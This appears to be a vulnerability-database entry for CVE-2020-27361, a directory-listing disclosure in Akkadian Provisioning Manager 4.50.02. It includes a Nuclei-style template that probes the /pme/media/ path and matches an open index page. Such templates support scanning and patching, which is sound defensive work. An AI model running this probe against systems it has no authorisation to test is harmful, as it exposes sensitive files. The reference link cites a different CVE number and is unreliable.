CVE-2020-27361: Akkadian Provisioning Manager 4.50.02 - Sensitive Information Disclosure

日期: 2025-08-01 | 影响软件: Akkadian Provisioning Manager | POC: 已公开

漏洞描述

Akkadian Provisioning Manager 4.50.02 could allow viewing of sensitive information within the /pme subdirectories.

PoC代码[已公开]

id: CVE-2020-27361

info:
  name: Akkadian Provisioning Manager 4.50.02 - Sensitive Information Disclosure
  author: gy741
  severity: high
  description: Akkadian Provisioning Manager 4.50.02 could allow viewing of sensitive information within the /pme subdirectories.
  impact: |
    An attacker can exploit this vulnerability to gain access to sensitive information, potentially leading to further attacks.
  remediation: |
    Apply the latest patch or upgrade to a newer version of Akkadian Provisioning Manager to fix the vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2020-27191
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2020-27361
    cwe-id: CWE-668
    epss-score: 0.85457
    epss-percentile: 0.99326
    cpe: cpe:2.3:a:akkadianlabs:akkadian_provisioning_manager:4.50.02:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: akkadianlabs
    product: akkadian_provisioning_manager
  tags: cve,cve2020,akkadian,listing,exposure,akkadianlabs

http:
  - method: GET
    path:
      - "{{BaseURL}}/pme/media/"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "Index of /pme/media"
          - "Parent Directory"
        condition: and

      - type: status
        status:
          - 200
# digest: 490a004630440220628f22e008d7ab62af3481414b631f20b2a3cdcddb4e328a24467f43c1a6b6a102205d6790bfbfbed7e8fa70b4859ce3136eb90e201beedde9cc50cc73b8058055bc:922c64590222798bb761d5b6d8e72950

相关漏洞推荐